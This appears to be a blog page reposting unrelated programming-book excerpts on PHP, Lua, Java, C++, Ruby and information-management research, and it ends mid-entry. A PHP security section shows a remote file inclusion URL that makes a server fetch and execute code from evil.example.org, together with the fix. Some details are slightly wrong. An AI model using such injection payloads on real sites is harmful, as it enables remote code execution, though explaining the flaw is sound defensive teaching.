Monday, January 11, 2010

Recipe 18.6. Keeping Passwords Out of Your Site Files

18.6.1. Problem

You need

to use a password to connect to a database, for example. You don't want to put the password in the PHP files you use on your site in case those files are exposed.

18.6.2. Solution

Store the password in an environment variable in a file that the web server loads when starting up. Then, just reference the environment variable in your code:

<?php

mysql_connect('localhost', $_SERVER['DB_USER'], $_SERVER['DB_PASSWORD']);

?>

18.6.3. Discussion

While this technique removes passwords from the source code of your pages, it makes them available in other places that need to be protected. Most importantly, make sure that there are no publicly viewable pages that call phpinfo( ). Because
phpinfo( ) displays all of the environment variables, it exposes any passwords you store there. Also, make sure not to expose the contents of $_SERVER
in other ways, such as with the
print_r( ) function.

Next, especially if you are using a shared host, make sure the environment variables are set in such a way that they are only available to your virtual host, not to all users. With Apache, you can do this by setting the variables in a separate file from the main configuration file:

SetEnv  DB_USER     "susannah"
SetEnv  DB_PASSWORD "y23a!t@ce8"

Inside the <VirtualHost> directive for the site in the main configuration file (httpd.conf),
include this separate file as follows:

Include "/usr/local/apache/database-passwords"

Make sure that this separate file containing the password (e.g., /usr/local/apache/database-passwords) is not readable by any user other than the one that controls the appropriate virtual host. When Apache starts up and is reading in configuration files, it's usually running as root, so it is able to read the included file. A child process that handles requests typically runs as an unprivileged user, so rogue scripts cannot read the protected file.

18.6.4. See Also

Documentation on Apache's Include directive at http://httpd.apache.org/docs/mod/core.html#include.

GIM Research Frameworks

No formal definition of global information management could be found in the IS literature. Deans and Ricks (1991) refer to issues at the "interface of MIS and international business" (p. 58). Palvia (1997) refers to "global IT research" and describes a model to "assess the strategic impact of IT on a global organization engaged in international business" (p. 230). For this chapter, we define global information management as the development, use, and management of information systems in a global/international context. By global we mean those information systems that have impacts beyond a single country or country of origin. The term global is used in a general sense since no firm or information system is found in every country in the world. Global information management deals with management, technological, and cultural issues such as differing national communications infrastructures, differing IS quality standards, IS development in different cultures, and many others. GIM research is the rigorous and systematic study of the development, use, and operations/management of a global information system(s) in a multicountry organizational environment. At the same time, traditional GIM research includes numerous single country studies focusing on the management of the information resource in a domestic context. According to Palvia (1998a), these "first generation" studies have laid the foundation and helped define global IT. This paper has therefore included single country studies in the analysis.

Most of the published literature in GIM that provides some kind of guide to research in the field has concentrated on identifying the "key issues" in the global management of information resources (Badri, 1992; Deans & Ricks, 1991; Ives & Jarvenpaa, 1991; Palvia, 1998b; Watson et al., 1997). These publications survey various stakeholders involved in the research and practice of GIM and are useful in that they attempt to capture what these people think are the critical issues in the field.

Very few papers propose frameworks or models that will help guide comprehensive research in this area. One exception is the work of Deans and Ricks (1991), who identify key issues and develop a research model based on Nolan and Wetherbe's (1981) IS research model and Skinner's (1964) work on international dimensions. This model views research as a set of subsystems that places management information systems (or GIM) at the center of the set. Skinner's international dimensions (social/cultural, economic, technological, political/legal) are overlaid on this framework to show the scope of the issues involved in GIM. This model is useful in a general sense but does not appear to help in showing where previous research fits or in guiding future research.

Another exception is Palvia (1997). In this paper, a model that attempts to measure the strategic impact of IT on the global firm is proposed. This model is useful in that it identifies a number of strategic factors that should be considered in studying global IT. However, this model does not identify key areas for future research in GIM and was not developed specifically to guide comprehensive research in the field.

Other preliminary frameworks with a focus on culture might also be considered GIM research frameworks. Ein-Dor, Segev, and Orgad (1993), in their model, contend that culture as a variable consists of three major dimensions—economic, demographic, and psycho-sociological. The authors argue that any research into global IT should consider these cultural dimensions. Nelson and Clark (1994) propose a model describing the effect of multicultural environments on IT development and use. However, both of these models are too narrow in their scope and do not provide a broad framework to guide research in GIM.

What appears to be missing at this point is an overall research model, similar to the early IS research models, which will help guide future research into GIM and help organize and categorize research previously done. According to Palvia (1998a), such a framework has yet to be developed.

Recipe 7.17. Defining Static Properties and Methods

7.17.1. Problem

You want
to

define methods in an object, and be able to access them without instantiating a object.

7.17.2. Solution

Declare the method as
static:

class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = ',', $thousands = '.') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57

7.17.3. Discussion

Occasionally, you want to define a collection of methods in an object, but you want to be able to invoke those methods without instantiating a object. In PHP 5, declaring a method static lets you call it directly:

class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = ',', $thousands = '.') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57

Since static methods don't require an object instance, use the class name instead of the object. Don't place a dollar sign ($) before the class name.

Static methods aren't referenced with an arrow (->),

but with double colons (::)'this signals to PHP that the method is static. So in the example, the number( ) method of the Format class is accessed using Format::number( ).

Number formatting doesn't depend on any other object properties or methods. Therefore, it makes sense to declare this method static. This way, for example, inside your shopping cart application, you can format the price of items in a pretty manner with just one line of code and still use an object instead of a global function.

Static methods do not operate on a specific instance of the class where they're defined. PHP does not "construct" a temporary object for you to use while you're inside the method. Therefore, you cannot refer to $this inside a static method, because there's no $this on which to operate. Calling a static method is just like calling a regular function.

PHP 5 also has a feature known as static properties. Every instance of a class shares these properties in common. Thus, static properties act as class-namespaced global variables.

One reason for using a static property is to share a database connection among multiple Database objects. For efficiency, you shouldn't create a new connection to your database every time you instantiate Database. Instead, negotiate a connection the first time and reuse that connection in each additional instance, as shown in Example 7-37.

Sharing a static method across instances

class Database {
    private static $dbh = NULL;

    public function __construct($server, $username, $password) {
        if (self::$dbh == NULL) {
            self::$dbh = db_connect($server, $username, $password);
        } else {
            // reuse existing connection
        }
    }
}

$db  = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do a bunch of queries

$db2 = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do some additional queries

Static properties, like static methods, use the double colon notation. To refer to a static property inside of a class, use the special prefix of self. self is to static properties and methods as $this is to instantiated properties and methods.

The constructor uses self::$dbh to access the static connection property. When $db is instantiated, dbh is still set to NULL, so the constructor calls
db_connect( ) to negotiate a new connection with the database.

This does not occur when you create $db2, since dbh has been set to the database handle.

7.17.4. See Also

Documentation on the static keyword at

http://www.php.net/manual/en/language.oop5.static.php.

The Stack

	Programming in Lua
	Part IV. The C API Chapter 24. An Overview of the C API

24.2 - The Stack

We face two problems when trying to exchange values between Lua and C:
the mismatch between a dynamic and a static type system
and the mismatch between
automatic and manual memory management.

In Lua, when we write a[k] = v,
both k and v can have several different types
(even a may have different types,
due to metatables).
If we want to offer this operation in C, however,
any settable function must have a fixed type.
We would need dozens of different functions for this single operation
(one function for each combination of types for the three arguments).

We could solve this problem by declaring some kind of union type in C,
let us call it lua_Value,
that could represent all Lua values.
Then, we could declare settable as


    void lua_settable (lua_Value a, lua_Value k, lua_Value v);

This solution has two drawbacks.
First, it can be difficult to map
such a complex type to other languages;
Lua has been designed to
interface easily not only with C/C++,
but also with Java, Fortran, and the like.
Second, Lua does garbage collection:
If we keep a Lua value in a C variable,
the Lua engine has no way to know about this use;
it may (wrongly) assume that this value is garbage
and collect it.

Therefore, the Lua API does not define
anything like a lua_Value type.
Instead, it uses an abstract stack to exchange values between Lua and C.
Each slot in this stack can hold any Lua value.
Whenever you want to ask for a value from Lua
(such as the value of a global variable),
you call Lua, which pushes the required value on the stack.
Whenever you want to pass a value to Lua,
you first push the value on the stack,
and then you call Lua (which will pop the value).
We still need a different function to push each C type on the stack
and a different function to get each value from the stack,
but we avoid the combinatorial explosion.
Moreover, because this stack is managed by Lua,
the garbage collector knows which values C is using.

Nearly all functions in the API use the stack.
As we saw in our first example,
luaL_loadbuffer leaves its result on the stack
(either the compiled chunk or an error message);
lua_pcall gets the function to be called from the stack
and leaves any occasional error message there.

Lua manipulates this stack in a strict LIFO discipline
(Last In, First Out; that is, always through the top).
When you call Lua, it only changes the top part of the stack.
Your C code has more freedom;
specifically, it can inspect any element inside the stack
and even insert and delete elements in any arbitrary position.

Programming in Lua

Section 5.4.  Code Injection

5.4. Code Injection

An extremely dangerous situation exists when you use tainted data as the leading part of a dynamic include:


    <?php

    include "{$_GET['path']}/header.inc";

    ?>

Rather than being able to manipulate only the filename, this situation allows an attacker to manipulate the nature of the resource to be included. Due to a feature of PHP that is enabled by default (and controlled by the allow_url_fopen directive), resources other than files can be included:


    <?php

    include 'http://www.google.com/';

    ?>

The behavior of this use of include is that the source of http://www.google.com is included as though it were a local file. While this particular example is harmless, imagine if the source returned by Google contained PHP code. The PHP code would be interpreted and executedexactly the opportunity that an attacker can take advantage of to deliver a serious blow to your security.

Imagine a value of path that indicates a resource under the attacker's control:


    http://example.org/index.php?path=http%3A%2F%2Fevil.example.org%2Fevil.inc%3F

In this example, path is the URL encoded value of the following:


    http://evil.example.org/evil.inc?

This causes the include statement to include and execute code of the attacker's choosing (evil.inc), and the filename is treated as the query string:


    <?php

    include "http://evil.example.org/evil.inc?/header.inc";

    ?>

This eliminates the need for an attacker to guess the remaining pathname and filename (/header.inc) and reproduce this at evil.example.org. Instead, all she must do is make the evil.inc script output valid PHP code to be executed by the victim's web serverit can ignore the query string.

This is just as dangerous as allowing an attacker to edit your PHP scripts directly. Luckily, it is easily defeateduse only filtered data in your include and require statements:


    <?php

    $clean = array();

    /* $_GET['path'] is filtered and stored in $clean['path']. */

    include "{$clean['path']}/header.inc";

    ?>

10. Strings

< Day Day Up >

10. Strings

This section concern character strings.

10.1. Arrays do not override `Object.toString`

Prescription: For char arrays, use String.valueOf to obtain the string representing the designated sequence of characters. For other types of arrays, use Arrays.toString or, prior to release 5.0, Arrays.asList.

References: Puzzle 12; [JLS 10.7].

10.2. `String.replaceAll` takes a regular expression as its first argument

Prescription: Ensure that the argument is a legal regular expression, or use String.replace instead.

References: Puzzle 20.

10.3. `String.replaceAll` takes a replacement string as its second argument

Prescription: Ensure that the argument is a legal replacement string, or use String.replace instead.

References: Puzzle 20.

10.4. Repeated string concatenation can cause poor performance

Prescription: Avoid using the string concatenation operator in loops.

References: [EJ item 33].

10.5. Conversion of bytes to characters requires a charset

Prescription: Always select a charset when converting a byte array to a string or char array; if you don't, the platform default charset will be used, leading to unpredictable behavior.

References: Puzzle 18.

10.6. Values of type `char` are silently converted to `int`, not `String`

Prescription: To convert a char to a string, use String.valueOf(char).

References: Puzzles 11 and 23; [JLS 5.1.2].

< Day Day Up >

The underflow_error Class


Class Name            underflow_error

Header File           <stdexcept>

Classification      Exception

Class Relationship Diagram

Class Description

Member Classes

None

Methods



underflow_error(const string &What_Arg)

Example

Class Description

The underflow_error class is derived from the runtime_error class.
The underflow_error class represents exceptions that occur because
arithmetic overflow error.



Method            underflow_error()

Access            Public

Classification    Constructor

Syntax            underflow_error(const string &What_Arg)      

Parameters        The What_Arg parameter should contain a description of the kind of exception
                  that has occurred.

Return            None

Description

The underflow_error() method constructs an object of type underflow_error. The What_Arg parameter
can be used to set a description of the kind of error that this exception represents.
A set possible solutions is sometimes supplied with the exception description in addition
to the type of error.

The Class Relationship Diagram of underflow_error


    1   
    2   #include <stdexcept>
    3   
    4   
    5   void main(void)
    6   {
    7   
    8   
    9      try{
   10   
   11            exception X;
   12            throw(X);
   13      }
   14      catch(const exception &X)
   15      {
   16          cout << X.what() << endl;
   17   
   18      }
   19   
   20      try
   21      {      
   22          underflow_error UnderFlow("Arithmetic Operation Underflow");
   23          throw(UnderFlow);
   24      }
   25      catch(const exception &X)
   26      {
   27          cout << X.what() << endl;
   28      }     
   29      
   30   
   31   
   32   }
   33

We Want to Hear from You!

[ Team LiB ]

We Want to Hear from You!

As the reader of this book, you are our most important critic and commentator. We value your opinion and want to know what we're doing right, what we could do better, what areas you'd like to see us publish in, and any other words of wisdom you're willing to pass our way.

As an associate publisher for Sams Publishing, I welcome your comments. You can email or write me directly to let me know what you did or didn't like about this book�as well as what we can do to make our books better.

Please note that I cannot help you with technical problems related to the topic of this book. We do have a User Services group, however, where I will forward specific technical questions related to the book.

When you write, please be sure to include this book's title and author as well as your name, email address, and phone number. I will carefully review your comments and share them with the author and editors who worked on the book.

Email:

feedback@samspublishing.com

Mail:

Michael Stephens
Associate Publisher
Sams Publishing
800 East 96th Street
Indianapolis, IN 46240 USA

For more information about this book or another Sams Publishing title, visit our Web site at www.samspublishing.com. Type the ISBN (excluding hyphens) or the title of a book in the Search field to find the page you're looking for.

[ Team LiB ]

Program 86: Lack of Self-Awareness

The following program is designed to test out our simple array. Yet there's a problem that causes the program to fail in an unexpected way.


  1 /************************************************
  2  * array_test -- Test the use of the array class*
  3  ************************************************/
  4 #include <iostream>
  5
  6 /************************************************
  7  * array -- Classic variable length array class.*
  8  *                                              *
  9  * Member functions:                            *
 10  *      operator [] -- Return an item           *
 11  *              in the array.                   *
 12  ************************************************/
 13 class array {
 14     protected:
 15         // Size of the array
 16         int size;
 17
 18         // The array data itself
 19         int *data;
 20     public:
 21         // Constructor.
 22         // Set the size of the array
 23         // and create data
 24         array(const int i_size):
 25             size(i_size),
 26             data(new int[size])
 27         {
 28             // Clear the data
 29             memset(data, '\0',
 30                     size * sizeof(data[0]));
 31         }
 32         // Destructor -- Return data to the heap
 33         virtual ~array(void)
 34         {
 35             delete []data;
 36             data = NULL;
 37         }
 38         // Copy constructor.
 39         // Delete the old data and copy
 40         array(const array &old_array)
 41         {
 42             delete []data;
 43             data = new int[old_array.size];
 44
 45             memcpy(data, old_array.data,
 46                     size * sizeof(data[o]));
 47         }
 48         // operator =.
 49         // Delete the old data and copy
 50         array & operator = (
 51                 const array &old_array)
 52         {
 53             delete []data;
 54             data = new int[old_array.size];
 55
 56             memcpy(data, old_array.data,
 57                     size * sizeof(data[0]));
 58             return (*this);
 59         }
 60     public:
 61         // Get a reference to an item in the array
 62         int &operator [](const unsigned int item)
 63         {
 64             return data[item];
 65         }
 66 };
 67
 68 /**********************************************
 69  * three_more_elements  --                    *
 70  *      Copy from_array to to_array and       *
 71  *      put on three more elements.           *
 72  **********************************************/
 73 void three_more_elements(
 74     // Original array
 75     array to_array,
 76
 77     // New array with modifications
 78     const array &from_array
 79 )
 80 {
 81     to_array = from_array;
 82     to_array[10] = 1;
 83     to_array[11] = 3;
 84     to_array[11] = 5;
 85 }
 86 int main()
 87 {
 88     array an_array(30);  // Simple test array
 89
 90     an_array[2] = 2;    // Put in an element
 91     // Put on a few more
 92     three_more_elements(an_array, an_array);
 93     return(0);
 94 }

(Next Hint 8. Answer 75.)

A programmer at IBM's Yorktown Heights Research Center had a problem. When he was sitting down, everything went fine. When he stood up, the computer failed. Now this problem was interesting in that it was completely repeatable. When he stood up, the machine always failed, and when he sat down it always worked. Nothing flaky about this problem.

The people in the computer office were baffled. After all, how could the computer know when the guy was standing or sitting? All sorts of theories were floated, such as static electricity, magnetic fields, and even acts of a playful God.

The most likely theory was that there was something loose under the carpet. It was a nice theory, but unfortunately it didn't fit the facts. Loose wires tend to cause intermittent problems, but this was 100 percent reproducible.

Finally a sharp-eyed engineer noticed something. When the programmer sat down, he touch typed. When he stood up, he used the hunt and peck method. A careful examination of the keyboard revealed that two of the keys had been reversed. This didn't matter when the fellow sat down and touch-typed. But when he rose and used the hunt-and-peck method, he was misled by the reversed keys and input the wrong data.

When the key caps were switched, the problem went away.

Recipe 10.3. Connecting to an SQL Database

10.3.1. Problem

You want access to a

SQL database to store or retrieve information. Without a database, dynamic web sites aren't very dynamic.

10.3.2. Solution

Create a new
PDO object with the appropriate connection string. Example 10-8 shows PDO object creation for a few different kinds of databases.

Connecting with PDO

<?php
// MySQL expects parameters in the string
$mysql = new PDO('mysql:host=db.example.com', $user, $password);
// Separate multiple parameters with ;
$mysql = new PDO('mysql:host=db.example.com;port=31075', $user, $password)
$mysql = new PDO('mysql:host=db.example.com;port=31075;dbname=food', $user, $password)
// Connect to a local MySQL Server
$mysql = new PDO('mysql:unix_socket=/tmp/mysql.sock', $user, $password)

// PostgreSQL also expects parameters in the string
$pgsql = new PDO('pgsql:host=db.example.com', $user, $password);
// But you separate multiple parameters with ' '
$pgsql = new PDO('pgsql:host=db.example.com port=31075', $user, $password)
$pgsql = new PDO('pgsql:host=db.example.com port=31075 dbname=food', $user, $password)
// You can put the user and password in the DSN if you like.
$pgsql = new PDO("pgsql:host=db.example.com port=31075 dbname=food user=$user password
=$password");

// Oracle
// If a database name is defined in tnsnames.ora, just put that in the DSN
$oci = new PDO('oci:food', $user, $password)
// Otherwise, specify an Instant Client URI
$oci = new PDO('oci:dbname=//db.example.com:1521/food', $user, $password)

// Sybase (If PDO is using FreeTDS)
$sybase = new PDO('sybase:host=db.example.com;dbname=food', $user, $password)
// Microsoft SQL Server (If PDO is using MS SQL Server libraries)
$mssql = new PDO('mssql:host=db.example.com;dbname=food', $user, $password);
// DBLib (for other versions of DB-lib)
$dblib = new PDO('dblib:host=db.example.com;dbname=food', $user, $password);

// ODBC -- a predefined connection
$odbc = new PDO('odbc:DSN=food');
// ODBC -- an ad-hoc connection. Provide whatever the underlying driver needs
$odbc = new PDO('odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=
C:\\data\\food.mdb;Uid=Chef');

// SQLite just expects a filename -- no user or password
$sqlite = new PDO('sqlite:/usr/local/zodiac.db');
$sqlite = new PDO('sqlite:c:/data/zodiac.db');
// SQLite can also handle in-memory, temporary databases
$sqlite = new PDO('sqlite::memory:');
// SQLite v2 DSNs look similar to v3
$sqlite2 = new PDO('sqlite2:/usr/local/old-zodiac.db');
?>

10.3.3. Discussion

If all goes well, the PDO constructor returns a new object that can be used for querying the database. If there's a problem, a PDOException is thrown.

As you can see from Example 10-8, the format of the DSN is highly dependent on which kind of database you're attempting to connect to. In general, though, the first argument to the PDO constructor is a string that describes the location and name of the database you want and the second and third arguments are the username and password to connect to the database with. Note that to use a particular PDO backend, PHP must be built with support for that backend. Use the output from phpinfo( ) to determine what PDO backends your PHP setup has.

10.3.4. See Also

Recipe 10.6 for querying an SQL database; Recipe 10.6 for modifying an SQL database; documentation on PDO at http://www.php.net/PDO.

Recipe 1.12. Generating Fixed-Width Field Data Records

1.12.1. Problem

You need to format

data records such that each field takes up a set amount of characters.

1.12.2. Solution

Use pack( )
with a format string that specifies a sequence of
space-padded strings. Example 1-32 transforms an
array of data into fixed-width records.

Generating fixed-width field data records

<?php

$books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                array('The Scarlatti Inheritance','Robert Ludlum',1971),
                array('The Parsifal Mosaic','William Styron',1979) );

foreach ($books as $book) {
    print pack('A25A15A4', $book[0], $book[1], $book[2]) . "\n";
}

?>

1.12.3. Discussion

The format string A25A14A4 tells pack( ) to transform its subsequent arguments into a 25-character space-padded string, a 14-character space-padded string, and a 4-character space-padded string. For space-padded fields in fixed-width records, pack( ) provides a concise solution.

To pad fields with something other than a space, however, use
substr( ) to ensure that the field values aren't too long and str_pad( ) to ensure that the field values aren't too short. Example 1-33 transforms an array of records into fixed-width records with .-padded fields.

Generating fixed-width field data records without pack( )

<?php

$books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                array('The Scarlatti Inheritance','Robert Ludlum',1971),
                array('The Parsifal Mosaic','William Styron',1979) );

foreach ($books as $book) {
    $title  = str_pad(substr($book[0], 0, 25), 25, '.');
    $author = str_pad(substr($book[1], 0, 15), 15, '.');
    $year   = str_pad(substr($book[2], 0, 4), 4, '.');
    print "$title$author$year\n";
}

?>

1.12.4. See Also

Documentation on pack( ) at http://www.php.net/pack and on str_pad( ) at http://www.php.net/str_pad. Recipe 1.16 discusses pack( ) format strings in more detail.

Recipe 21.5. Avoiding Regular Expressions

21.5.1. Problem

You want to
improve script performance by optimizing string-matching operations.

21.5.2. Solution

Replace unnecessary regular expression calls with faster string and character type function alternatives.

21.5.3. Discussion

A common source of unnecessary computation is the use of regular expression functions when they are not needed'for example, if you're validating a
form submission for a valid username and want to make sure that the username contains only alphanumeric characters.

A common approach to this problem is a regular expression:

<?php
if (!preg_match('/^[a-z0-9]*$/i', $username)) {
  echo 'please enter a valid username.';
}
?>

The same test can be performed much faster with the ctype_alnum( )
function.

Using code-timing techniques covered in Recipe 21.1, let's compare the above test with ctype_alnum( ):

<?php
$username = 'foo411';

$start = microtime(true);

if (!preg_match('/^[a-z0-9]*/i', $username)) {
    echo 'please enter a valid username';
}

$regextime = microtime(true) - $start;

$start = microtime(true);

if (!ctype_alnum($username)) {
    echo 'please enter a valid username';
}

$ctypetime = microtime(true) - $start;

echo "preg_match took:  $regextime seconds\n";
echo "ctype_alnum took: $ctypetime seconds\n";
?>

This will output results similar to:

preg_match took:  0.000163078308105 seconds
ctype_alnum took: 9.05990600586E-06 seconds

ctype_alnum( ) is considerably faster; 9.05990600586E-06 is the same as 0.00000906 seconds, which is 18 times faster than the preg_match( ) regular expression, with exactly the same result.

When applied to a complex application, replacing unnecessary regular expressions with equivalent alternatives can add up to a significant performance gain.

A good litmus test when you're coding and need to decide whether or not you need to use a regular expression is whether or not the match you're performing can be explained in a brief sentence. Granted, there are some matches, such as "string is a valid email address," which cannot be adequately verified without a complex regular expression. However, "check if string A contains string B" can be tested with several different approaches, but is ultimately a very simple test that does not require regular expressions:

$haystack = 'The quick brown fox jumps over the lazy dog';
$needle = 'lazy dog';

// slowest
if (ereg($needle, $haystack)) echo 'match!';

// slow
if (preg_match("/$needle/", $haystack)) echo 'match!';


// fast
if (strstr($haystack, $needle)) echo 'match!';

// fastest
if (strpos($haystack, $needle) !== false) echo 'match!';

There is certainly a benefit to double-checking the ctype and string functions before making a commitment to a regular expression, particularly if you're working a section of code that will loop repeatedly.

21.5.4. See Also

Documentation on ctype functions at http://www.php.net/manual/en/ref.ctype.php; on string functions at http://www.php.net/manual/en/ref.strings.php; on regular expression functions at http://www.php.net/manual/en/ref.pcre.php.

Section 10.2. The Top-Level Environment

10.2. The Top-Level Environment

When the Ruby interpreter starts, a number of classes, modules,
constants, and global variables and global functions are defined and
available for use by programs. The subsections that follow list these
predefined features.

10.2.1. Predefined Modules and Classes

When the Ruby 1.8 interpreter starts, the following modules are
defined:

Comparable      FileTest        Marshal         Precision
Enumerable      GC              Math            Process
Errno           Kernel          ObjectSpace     Signal

These classes are defined on startup:

Array           File            Method          String
Bignum          Fixnum          Module          Struct
Binding         Float           NilClass        Symbol
Class           Hash            Numeric         Thread
Continuation    IO              Object          ThreadGroup
Data            Integer         Proc            Time
Dir             MatchData       Range           TrueClass
FalseClass      MatchingData    Regexp          UnboundMethod

The following exception classes are also defined:

ArgumentError           NameError               SignalException
EOFError                NoMemoryError           StandardError
Exception               NoMethodError           SyntaxError
FloatDomainError        NotImplementedError     SystemCallError
IOError                 RangeError              SystemExit
IndexError              RegexpError             SystemStackError
Interrupt               RuntimeError            ThreadError
LoadError               ScriptError             TypeError
LocalJumpError          SecurityError           ZeroDivisionError

Ruby 1.9 adds the following modules, classes, and
exceptions:

BasicObject     FiberError      Mutex           VM
Fiber           KeyError        StopIteration

You can check the predefined modules, classes, and exceptions in
your implementation with code like this:

# Print all modules (excluding classes)
puts Module.constants.sort.select {|x| eval(x.to_s).instance_of? Module}

# Print all classes (excluding exceptions)
puts Module.constants.sort.select {|x|
  c = eval(x.to_s)
  c.is_a? Class and not c.ancestors.include? Exception
}

# Print all exceptions
puts Module.constants.sort.select {|x|
  c = eval(x.to_s)
  c.instance_of? Class and c.ancestors.include? Exception
}

10.2.2. Top-Level Constants

When the Ruby interpreter starts, the following top-level
constants are defined (in addition
to the modules and classes listed previously). A module that defines a
constant by the same name can still access these top-level constants by
explicitly prefixing them with ::. You can list the
top-level constants in your implementation with:

ruby -e 'puts Module.constants.sort.reject{|x| eval(x.to_s).is_a? Module}'

ARGF: An IO object providing access to a
virtual concatenation of files named in ARGV,
or to standard input if ARGV is empty. A
synonym for $<.
ARGV: An array containing the arguments specified on the command line. A
synonym for $*.
DATA: If your program file includes the token
__END__ on a line by itself, then this constant
is defined to be a stream that allows access to the lines of the
file following __END__. If the program file
does not include __END__, then this constant is
not defined.
ENV: An object that behaves like a hash and provides access
to the environment variable settings in effect for the
interpreter.
FALSE: A deprecated synonym for false.
NIL: A deprecated synonym for nil.
RUBY_PATCHLEVEL: A string indicating the patchlevel for the interpreter.
RUBY_PLATFORM: A string indicating the platform of the Ruby interpreter.
RUBY_RELEASE_DATE: A string indicating the release date of the Ruby interpreter.
RUBY_VERSION: A string indicating the version of the Ruby language supported by the
interpreter.
STDERR: The standard error output stream. This is the default
value of the $stderr variable.
STDIN: The standard input stream. This is the default value of the
$stdin variable.
STDOUT: The standard output stream. This is the default value of the
$stdout variable.
TOPLEVEL_BINDING: A Binding object representing the
bindings in the top-level scope.
TRUE: A deprecated synonym for true.

10.2.3. Global Variables

The Ruby interpreter predefines a number of global variables that your
programs can use. Many of these variables are special in some way. Some
use punctuation characters in their names. (The
English.rb module defines English-language
alternatives to the punctuation. Add require 'English' to your program if you want to use these verbose
alternatives.) Some are read-only and may not be assigned to. And some
are thread-local, so that each thread of a Ruby program may see a
different value of the variable. Finally, some global variables
($_, $~, and the pattern-matching
variables derived from it) are method-local: although the variable is
globally accessible, its value is local to the current method. If a
method sets the value of one of these magic globals, it does not alter
the value seen by the code that invokes that method.

You can obtain the complete list of global variables predefined by
your Ruby interpreter with:

ruby -e 'puts global_variables.sort'

To include the verbose names from the English
module in your listing, try:

ruby -rEnglish -e 'puts global_variables.sort'

The subsections that follow document the predefined global
variables by category.

10.2.3.1. Global settings

These global variables hold configuration settings and specify
information, such as command-line arguments, about the environment in
which the Ruby program is running:

$*: A read-only synonym for the ARGV
constant. English synonym: $ARGV.
$$: The process ID of the current Ruby process. Read-only.
English synonyms: $PID,
$PROCESS_ID.
$?: The exit status of the last process terminated.
Read-only and thread-local. English synonym:
$CHILD_STATUS.
$DEBUG
$-d: Set to true if the
-d or --debug options were
set on the command line.
$KCODE
$-K: In Ruby 1.8, this variable holds a string that names the
current text encoding. Its value is "NONE", "UTF8", "SJIS" or
"EUC". This value can be set with the interpreter option
-K. This variable no longer works in Ruby 1.9
and using it causes a warning.
$LOADED_FEATURES
$": An array of strings naming the files that have been
loaded. Read-only.
$LOAD_PATH
$:
$-I: An array of strings holding the directories to be searched
when loading files with the load and
require methods. This variable is read-only,
but you can alter the contents of the array to which it refers,
appending or prepending new directories to the path, for
example.
$PROGRAM_NAME
$0: The name of the file that holds the Ruby program currently
being executed. The value will be "-" if the
program is read from standard input, or "-e"
if the program was specified with a -e
option. Note that this is different from
$FILENAME.
$SAFE: The current safe level for program execution. See Section 10.5
for details. This variable may be set from the command line with
the -T option. The value of this variable is
thread-local.
$VERBOSE
$-v
$-w: True if the -v, -w,
or --verbose command-line option is
specified. nil if -W0 was
specified. false otherwise. You can set this
variable to nil to suppress all
warnings.

10.2.3.2. Exception-handling globals

The following two global variables are useful in
rescue clauses when an exception has been
raised:

$!: The last exception object raised. The exception
object can also be accessed using the =>
syntax in the declaration of the rescue
clause. The value of this variable is thread-local. English
synonym: $ERROR_INFO.
$@: The stack trace of the last exception, equivalent to
$!.backtrace. This value is thread-local.
English synonym: $ERROR_POSITION.

10.2.3.3. Streams and text-processing globals

The following globals are IO streams and variable that
affect the default behavior of text-processing
Kernel methods. You'll find examples of their use
in Section 10.3:

$_: The last string read by the Kernel
methods gets and readline.
This value is thread-local and method-local. A number of
Kernel methods operate implicitly on
$_. English synonym:
$LAST_READ_LINE.
$<: A read-only synonym for the ARGF
stream: an IO-like object providing access to
a virtual concatenation of the files specified on the
command-line, or to standard input if no files were specified.
Kernel read methods, such as
gets, read from this stream. Note that this
stream is not always the same as $stdin.
English synonym: $DEFAULT_INPUT.
$stdin: The standard input stream. The initial value of this
variable is the constant STDIN. Many Ruby
program read from ARGF or
$< instead of
$stdin.
$stdout
$>: The standard output stream, and the destination of the
printing methods of Kernel: puts,
print, printf, etc.
English synonym: $DEFAULT_OUTPUT.
$stderr: The standard error output stream. The initial value of this variable
is the constant STDERR.
$FILENAME: The name of the file currently being read from
ARGF. Equivalent to
ARGF.filename. Read-only.
$.: The number of the last line read from the current input file.
Equivalent to ARGF.lineno. English synonyms:
$NR,
$INPUT_LINE_NUMBER.
$/
$-0: The input record separator (newline by default).
gets and readline use this
value by default to determine line boundaries. You can set this
value with the -0 interpreter option. English
synonyms: $RS,
$INPUT_RECORD_SEPARATOR.
$\: The output record separator. The default value is
nil, but is set to $/ when
the interpreter option -l is used. If
non-nil, the output record separator is
output after every call to print (but not
puts or other output methods). English
synonyms: $ORS,
$OUTPUT_RECORD_SEPARATOR.
$,: The separator output between the arguments to
print and the default separator for
Array.join. The default is
nil. English synonyms:
$OFS, $OUTPUT_FIELD_SEPARATOR.
$;
$-F: The default field separator used by split. The
default is nil, but you can specify a value
with the interpreter option -F. English
synonyms: $FS,
$FIELD_SEPARATOR.
$F: This variable is defined if the Ruby interpreter is invoked with
the -a option and either
-n or -p. It holds the
fields of the current input line, as returned by
split.

10.2.3.4. Pattern-matching globals

The following globals are thread-local and method-local and are
set by any Regexp pattern-matching
operation:

$~: The MatchData object produced by
the last pattern matching operation. This value is thread-local
and method-local. The other pattern-matching globals described
here are derived from this one. Setting this variable to a new
MatchData object alters the value of the
other variables. English synonym:
$MATCH_INFO.
$&: The most recently matched text. Equivalent to
$~[0]. Read-only, thread-local, method-local,
and derived from $~. English synonym:
$MATCH.
$`: The string preceding the match in the last pattern match. Equivalent to
$~.pre_match. Read-only, thread-local,
method-local, and derived from $~. English
synonym: $PREMATCH.
$': The string following the match in the last pattern match.
Equivalent to $~.post_match Read-only,
thread-local, method-local, and derived from
$~. English synonym:
$POSTMATCH.
$+: The string corresponding to the last successfully matched
group in the last pattern match. Read-only, thread-local,
method-local, and derived from $~. English
synonym:
$LAST_PAREN_MATCH.

10.2.3.5. Command-line option globals

Ruby defines a number of global variables that correspond to the
state or value of interpreter command-line options. The variables
$-0, $-F,
$-I, $-K,
$-d, $-v, and
$-w have synonyms and are included in the previous
sections:

$-a: true if the interpreter option
-a was specified; false
otherwise. Read-only.
$-i: nil if the interpreter option
